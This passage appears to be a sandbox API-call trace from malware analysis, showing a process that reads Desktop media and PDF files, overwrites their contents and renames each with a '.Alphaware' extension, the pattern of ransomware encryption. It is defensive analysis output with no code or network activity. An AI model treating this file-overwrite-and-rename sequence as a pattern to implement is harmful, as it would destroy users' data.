lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.282] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.283] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.283] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.283] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.284] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.284] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.284] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.285] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.285] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.285] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.286] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.286] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.286] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.287] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.287] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.287] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.287] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.288] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.288] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.288] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.289] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.289] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.289] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.290] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.290] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.290] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.290] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.291] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.291] WriteFile (in: hFile=0x254, lpBuffer=0x24f9f48*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24f9f48*, lpNumberOfBytesWritten=0x23e9f8*=0xda0, lpOverlapped=0x0) returned 1 [0080.291] CloseHandle (hObject=0x254) returned 1 [0080.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.294] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fWyG0v4r7aIxC.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\fwyg0v4r7aixc.gif"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df57b0, ftCreationTime.dwHighDateTime=0x1d9684e, ftLastAccessTime.dwLowDateTime=0xcd8c2700, ftLastAccessTime.dwHighDateTime=0x1d96ddb, ftLastWriteTime.dwLowDateTime=0x820da500, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1fda0)) returned 1 [0080.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.295] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\fWyG0v4r7aIxC.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\fwyg0v4r7aixc.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\fWyG0v4r7aIxC.gif.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\fwyg0v4r7aixc.gif.alphaware")) returned 1 [0080.296] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\IPAZp7HIeyfBa.avi", dwFileAttributes=0x80) returned 1 [0080.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.297] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\IPAZp7HIeyfBa.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\ipazp7hieyfba.avi"), fInfoLevelId=0x0, lpFileInformation=0x24fb8c8 | out: lpFileInformation=0x24fb8c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7a0d1f70, ftCreationTime.dwHighDateTime=0x1d966e3, ftLastAccessTime.dwLowDateTime=0x884587a0, ftLastAccessTime.dwHighDateTime=0x1d968f3, ftLastWriteTime.dwLowDateTime=0x884587a0, ftLastWriteTime.dwHighDateTime=0x1d968f3, nFileSizeHigh=0x0, nFileSizeLow=0x16bf2)) returned 1 [0080.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.297] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\IPAZp7HIeyfBa.avi", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\IPAZp7HIeyfBa.avi", lpFilePart=0x0) returned 0x2c [0080.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.297] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\IPAZp7HIeyfBa.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\ipazp7hieyfba.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.298] GetFileType (hFile=0x254) returned 0x1 [0080.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.298] GetFileType (hFile=0x254) returned 0x1 [0080.298] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x16bf2 [0080.298] ReadFile (in: hFile=0x254, lpBuffer=0x12a75e70, nNumberOfBytesToRead=0x16bf2, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x12a75e70*, lpNumberOfBytesRead=0x23eb38*=0x16bf2, lpOverlapped=0x0) returned 1 [0080.300] CloseHandle (hObject=0x254) returned 1 [0080.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.326] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\IPAZp7HIeyfBa.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\ipazp7hieyfba.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.330] GetFileType (hFile=0x254) returned 0x1 [0080.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.330] GetFileType (hFile=0x254) returned 0x1 [0080.330] WriteFile (in: hFile=0x254, lpBuffer=0x2577b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2577b28*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.331] WriteFile (in: hFile=0x254, lpBuffer=0x2577b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2577b28*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0080.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.335] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\IPAZp7HIeyfBa.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\ipazp7hieyfba.avi"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a0d1f70, ftCreationTime.dwHighDateTime=0x1d966e3, ftLastAccessTime.dwLowDateTime=0x884587a0, ftLastAccessTime.dwHighDateTime=0x1d968f3, ftLastWriteTime.dwLowDateTime=0x8214c920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e620)) returned 1 [0080.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.336] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\IPAZp7HIeyfBa.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\ipazp7hieyfba.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\IPAZp7HIeyfBa.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\ipazp7hieyfba.avi.alphaware")) returned 1 [0080.340] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\j 99Z9MOpk.pdf", dwFileAttributes=0x80) returned 1 [0080.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.340] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\j 99Z9MOpk.pdf" (normalized: "c:\\users\\keecfmwgj\\desktop\\j 99z9mopk.pdf"), fInfoLevelId=0x0, lpFileInformation=0x2579248 | out: lpFileInformation=0x2579248*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x76200920, ftCreationTime.dwHighDateTime=0x1d96988, ftLastAccessTime.dwLowDateTime=0xc8474ef0, ftLastAccessTime.dwHighDateTime=0x1d96d09, ftLastWriteTime.dwLowDateTime=0xc8474ef0, ftLastWriteTime.dwHighDateTime=0x1d96d09, nFileSizeHigh=0x0, nFileSizeLow=0x101d7)) returned 1 [0080.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.341] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\j 99Z9MOpk.pdf" (normalized: "c:\\users\\keecfmwgj\\desktop\\j 99z9mopk.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.341] ReadFile (in: hFile=0x254, lpBuffer=0x2579480, nNumberOfBytesToRead=0x101d7, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2579480*, lpNumberOfBytesRead=0x23eb38*=0x101d7, lpOverlapped=0x0) returned 1 [0080.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.365] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\j 99Z9MOpk.pdf" (normalized: "c:\\users\\keecfmwgj\\desktop\\j 99z9mopk.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.370] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\j 99Z9MOpk.pdf" (normalized: "c:\\users\\keecfmwgj\\desktop\\j 99z9mopk.pdf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76200920, ftCreationTime.dwHighDateTime=0x1d96988, ftLastAccessTime.dwLowDateTime=0xc8474ef0, ftLastAccessTime.dwHighDateTime=0x1d96d09, ftLastWriteTime.dwLowDateTime=0x82198be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x158a0)) returned 1 [0080.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.371] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\j 99Z9MOpk.pdf" (normalized: "c:\\users\\keecfmwgj\\desktop\\j 99z9mopk.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\j 99Z9MOpk.pdf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\j 99z9mopk.pdf.alphaware")) returned 1 [0080.374] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\JmY86mr.swf", dwFileAttributes=0x80) returned 1 [0080.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.374] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\JmY86mr.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\jmy86mr.swf"), fInfoLevelId=0x0, lpFileInformation=0x2637a20 | out: lpFileInformation=0x2637a20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xa64186c0, ftCreationTime.dwHighDateTime=0x1d973b4, ftLastAccessTime.dwLowDateTime=0x82a38ef0, ftLastAccessTime.dwHighDateTime=0x1d97618, ftLastWriteTime.dwLowDateTime=0x82a38ef0, ftLastWriteTime.dwHighDateTime=0x1d97618, nFileSizeHigh=0x0, nFileSizeLow=0xb2e4)) returned 1 [0080.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.375] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\JmY86mr.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\jmy86mr.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.375] ReadFile (in: hFile=0x254, lpBuffer=0x2637c38, nNumberOfBytesToRead=0xb2e4, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2637c38*, lpNumberOfBytesRead=0x23eb38*=0xb2e4, lpOverlapped=0x0) returned 1 [0080.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.404] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\JmY86mr.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\jmy86mr.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.408] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\JmY86mr.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\jmy86mr.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa64186c0, ftCreationTime.dwHighDateTime=0x1d973b4, ftLastAccessTime.dwLowDateTime=0x82a38ef0, ftLastAccessTime.dwHighDateTime=0x1d97618, ftLastWriteTime.dwLowDateTime=0x8220b000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xef60)) returned 1 [0080.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.408] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\JmY86mr.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\jmy86mr.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\JmY86mr.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\jmy86mr.swf.alphaware")) returned 1 [0080.410] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\kbuOLBA.swf", dwFileAttributes=0x80) returned 1 [0080.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.410] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\kbuOLBA.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\kbuolba.swf"), fInfoLevelId=0x0, lpFileInformation=0x24b97e0 | out: lpFileInformation=0x24b97e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce564210, ftCreationTime.dwHighDateTime=0x1d97560, ftLastAccessTime.dwLowDateTime=0x34677f10, ftLastAccessTime.dwHighDateTime=0x1d975a2, ftLastWriteTime.dwLowDateTime=0x34677f10, ftLastWriteTime.dwHighDateTime=0x1d975a2, nFileSizeHigh=0x0, nFileSizeLow=0xb4b9)) returned 1 [0080.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.411] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\kbuOLBA.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\kbuolba.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.411] ReadFile (in: hFile=0x254, lpBuffer=0x24b99f8, nNumberOfBytesToRead=0xb4b9, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24b99f8*, lpNumberOfBytesRead=0x23eb38*=0xb4b9, lpOverlapped=0x0) returned 1 [0080.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.433] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\kbuOLBA.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\kbuolba.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\kbuOLBA.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\kbuolba.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce564210, ftCreationTime.dwHighDateTime=0x1d97560, ftLastAccessTime.dwLowDateTime=0x34677f10, ftLastAccessTime.dwHighDateTime=0x1d975a2, ftLastWriteTime.dwLowDateTime=0x822572c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf1c8)) returned 1 [0080.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.439] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\kbuOLBA.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\kbuolba.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\kbuOLBA.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\kbuolba.swf.alphaware")) returned 1 [0080.440] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\KMPe82eGM5iAzO PVI.mp3", dwFileAttributes=0x80) returned 1 [0080.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.441] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\KMPe82eGM5iAzO PVI.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\kmpe82egm5iazo pvi.mp3"), fInfoLevelId=0x0, lpFileInformation=0x2564c40 | out: lpFileInformation=0x2564c40*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x9c1b19f0, ftCreationTime.dwHighDateTime=0x1d96657, ftLastAccessTime.dwLowDateTime=0x2adc7f00, ftLastAccessTime.dwHighDateTime=0x1d96831, ftLastWriteTime.dwLowDateTime=0x2adc7f00, ftLastWriteTime.dwHighDateTime=0x1d96831, nFileSizeHigh=0x0, nFileSizeLow=0x4ad4)) returned 1 [0080.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.441] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\KMPe82eGM5iAzO PVI.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\kmpe82egm5iazo pvi.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.444] ReadFile (in: hFile=0x254, lpBuffer=0x2564eb8, nNumberOfBytesToRead=0x4ad4, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2564eb8*, lpNumberOfBytesRead=0x23eb38*=0x4ad4, lpOverlapped=0x0) returned 1 [0080.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.481] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\KMPe82eGM5iAzO PVI.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\kmpe82egm5iazo pvi.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.491] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\KMPe82eGM5iAzO PVI.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\kmpe82egm5iazo pvi.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: 